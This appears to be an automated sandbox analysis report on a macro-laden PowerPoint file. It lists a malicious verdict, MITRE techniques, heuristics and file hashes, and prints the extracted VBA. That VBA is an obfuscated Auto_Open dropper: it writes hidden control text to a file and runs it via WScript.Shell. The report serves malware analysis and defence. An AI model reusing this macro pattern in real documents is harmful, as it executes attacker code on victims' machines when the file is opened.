Verdict: MALICIOUS
Risk Score: 260
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The OOXML document contains a VBA project with an Auto_Open macro, a common technique for executing malicious code as soon as the document is opened. The script uses WScript.Shell to execute a command, likely to download and run a secondary payload. The obfuscated string manipulation and the use of 'WScript.Shell' and 'CreateObject' strongly indicate downloader or dropper functionality.
Heuristics (6)
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project — VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1582 bytes | 1158b063f45fd66226e2939a27a1a111e68da90abd23a904657d891fa6727d0e |
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 38400 bytes | 9259a1ea128247fd6aff762e90d8763b1b5f06319683cd1070972a3605236908 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "dasOxPj"
Public fLVgCOW As New yDqqMJM
Sub iucTCFt()
fLVgCOW.fBCYHOa
End Sub
Attribute VB_Name = "rbDNZln"
Attribute VB_Base = "0{F36C00B2-36DA-457A-8078-D72933F72A67}{7737DD57-4184-46EF-A0C6-3D5384A74331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "yDqqMJM"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function ikRcTfj(cDRWdnC)
ikRcTfj = Replace(cDRWdnC, "03Nc@<$}(cpTHvl#u*3]{*.O83qcz6cPj~~qC8b7", "")
End Function
Sub fBCYHOa()
Dim VOxiXNa As String: VOxiXNa = rbDNZln.vnfbObJ.Tag
Dim xaMcWqg As String: xaMcWqg = ikRcTfj(VOxiXNa)
Open xaMcWqg For Output As #1
Dim kNXYjtU As String: kNXYjtU = rbDNZln.vnfbObJ.ControlTipText
Dim HOIzFId As String: HOIzFId = ikRcTfj(kNXYjtU)
Print #1, HOIzFId
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set FszubiS = CreateObject("WScript.Shell")
Set MkypMVG = FszubiS.exEc("C:\Windows\Explorer " & xaMcWqg)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
Attribute VB_Name = "mLWJOCw"
Public Sub aUtO_oPeN()
dasOxPj.iucTCFt
End Sub
```